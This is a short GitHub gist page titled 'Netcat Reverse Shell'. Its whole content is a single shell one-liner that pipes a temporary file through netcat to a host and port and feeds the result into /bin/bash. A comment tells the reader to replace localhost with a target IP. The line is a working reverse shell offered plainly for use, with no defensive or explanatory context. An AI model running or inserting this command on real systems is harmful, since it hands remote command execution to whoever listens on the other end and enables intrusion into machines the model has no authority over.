Skip to content

Instantly share code, notes, and snippets.

@SamRH
Created June 28, 2011 03:05
Show Gist options
  • Save SamRH/1050401 to your computer and use it in GitHub Desktop.
Save SamRH/1050401 to your computer and use it in GitHub Desktop.
Netcat Reverse Shell
cat /tmp/blarg | nc localhost 6667 | /bin/bash &> /tmp/blarg #replace localhost with IP
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment